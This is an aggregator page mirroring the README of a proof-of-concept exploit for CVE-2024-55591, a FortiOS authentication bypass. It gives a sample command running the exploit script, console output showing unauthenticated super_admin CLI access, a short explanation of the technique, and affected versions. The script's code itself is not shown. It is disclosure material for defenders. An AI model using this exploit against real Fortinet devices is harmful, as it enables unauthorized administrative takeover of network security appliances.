关联漏洞
标题:
Fortinet FortiOS和FortiProxy 安全漏洞
(CVE-2024-55591)
描述:Fortinet FortiOS和Fortinet FortiProxy都是美国飞塔(Fortinet)公司的产品。Fortinet FortiOS是一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。Fortinet FortiProxy是一种安全的网络代理,通过结合多种检测技术,如Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护,可以保护员工免受网络攻击。FortiProxy有助于减
介绍
# CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Exploit Proof of Concept
See our [blog post](https://labs.watchtowr.com/) for technical details
# Detection in Action
```
python CVE-2024-55591-Exploit-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \
\/\_/ (____ |__| \\\\___ |___|__|__ | \\__ / \\/\_/ |__|
\\ \\ \\
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) Exploit POC by watchTowr
- Sonny , watchTowr (sonny@watchTowr.com)
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
```
# Description
This script is a proof of concept for CVE-2024-55591, targeting FortiOS (Fortigate) management interfaces. By creating brute forcing WebSocket connections to create a race condition along with an authentication bypass, it is possible to send FortiOS CLI commands unauthenticated. More details are described within our [blog post] (https://labs.watchtowr.com/).
# Affected Versions
* FortiOS 7.0.0 through 7.0.16
* FortiProxy 7.0.0 through 7.0.19
* FortiProxy 7.2.0 through 7.2.12
More details at [Fortinet advisory](https://www.fortiguard.com/psirt/FG-IR-24-535)
# Note
This script isn't designed to work with FortiProxy, as pre-flight checks determine if the instance is a FortiGate Management Interface, but it is assumed the underlying technique is applicable to affected FortiProxy devices.
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
文件快照
[4.0K] /data/pocs/d6a47d4408f2bf8da6879e15ca07ed7da0935a02
├── [7.9K] CVE-2024-55591-Exploit-PoC.py
└── [2.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。